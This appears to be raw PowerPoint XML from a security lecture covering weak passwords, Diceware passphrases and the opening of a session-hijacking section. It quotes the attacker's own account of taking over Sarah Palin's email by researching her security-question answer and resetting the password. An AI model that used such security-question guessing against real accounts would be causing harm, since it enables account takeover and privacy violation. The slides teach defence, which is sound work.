                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" i="1" dirty="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>did some research, and apparently she had eloped with mister </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" i="1" dirty="0" err="1">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>palin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" i="1" dirty="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> after college, if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" i="1" dirty="0" err="1">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>youll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" i="1" dirty="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> look on some of the screenshots that I took and other fellow anon have so graciously put on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" i="1" dirty="0" err="1">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>photobucket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" i="1" dirty="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> you will see the google search for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1400" i="1" dirty="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" i="1" dirty="0" err="1">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>palin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" i="1" dirty="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> eloped</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1400" i="1" dirty="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" i="1" dirty="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> or some such in one of the tabs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>     I found out later though more research that they met at high school, so I did variations of that, high, high school, eventually hit on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Wasilla high</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" i="1" dirty="0">
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>I promptly changed the password to popcorn and took a cold shower…  [sic]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="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altLang="en-US" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Weak Passwords</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5325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481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CE2156B-4D9B-482E-A9E4-BD9D2FEC4193}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48132" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="4937125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Password1 is the most used password. See:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://digitaljournal.com/article/320609</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.trustwave.com/global-security-report</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Report considered 2 million network vulnerability scans and examined 300 recent security breach investigations in its assessment.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" i="1" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1700" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>"Password1" is the "most common password used by global businesses because it satisfies the default Microsoft Active Directory complexity setting." This simple password contains an upper-case letter, a number and at least nine characters, which makes it 'complex'. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Other popular passwords</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>password, guest, 123456, 12345678, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" err="1">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>letmein</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" err="1">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>iloveyou</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="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altLang="en-US">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>PassPhrases</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142340" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="6356350"/>
            <a:ext cx="4346575"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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="491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A023F0D-8D1D-4D9F-99EC-32C37E0F4237}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49156" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Bookman Old Style" panose="02050604050505020204" pitchFamily="18" charset="0"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>A passphrase is like a password but longer and more secure. It is an encryption key that you memorize.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" b="1" u="sng" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Problem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>:  how do you come up with easy-to-memorize but very secure passphrases? Just thinking of one is incredibly hard,  especially  if your adversary really is capable of one trillion guesses per second.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Using an entirely random sequence of characters it might be very secure, but it’s also agonizing to memorize.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" b="1" u="sng" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Solution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>: use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" err="1">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Diceware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://en.wikipedia.org/wiki/Diceware</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Shakespeare quotes are not good passphrases because they lack something called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" u="sng" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>entropy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> (randomness)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" err="1">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Diceware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> is based on a word list which contains 7,776 English words — 37 pages of it printed:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://world.std.com/~reinhold/dicewarewordlist.pdf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Roll a dice 5 times to select one word at a time for your passphrase</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>If you are worried about the NSA, come up with a 7-word passphrase: there is a one in 1,719,070,799,748,422,591,028,658,176 chance that an attacker will pick your passphrase each try.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>At one trillion guesses per second — per Edward Snowden’s January 2013 warning — it would take an average of 27 million years to guess this passphrase.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>This one does it: “bolt vat frisky fob land hazy rigid”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" b="1" u="sng" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Recommendation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>: use a password database (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" err="1">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>KeePassX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>) locked up with a master “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" dirty="0" err="1">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>diceware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> passphrase:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> 	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.keepassx.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>See: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://firstlook.org/theintercept/2015/03/26/passphrases-can-memorize-attackers-cant-guess/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="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tLang="en-US">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>		Authorization Attacks		</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54277" name="Footer Placeholder 4"/>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F570957-F031-4374-ABC4-3E9125B757D4}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B05020201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altLang="en-US" sz="2900">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Credential / Session Prediction (Session Hijacking)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5530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512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7115273-9ECF-42AF-B5FE-EF50DD8D3B3B}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51204" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="4937125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Credential/Session prediction is a method of hijacking or impersonating a web site user. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Typically, websites associate a unique value called a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" i="1" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>session ID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>with a user when the authentication is done. </a:t>
            </a:r>
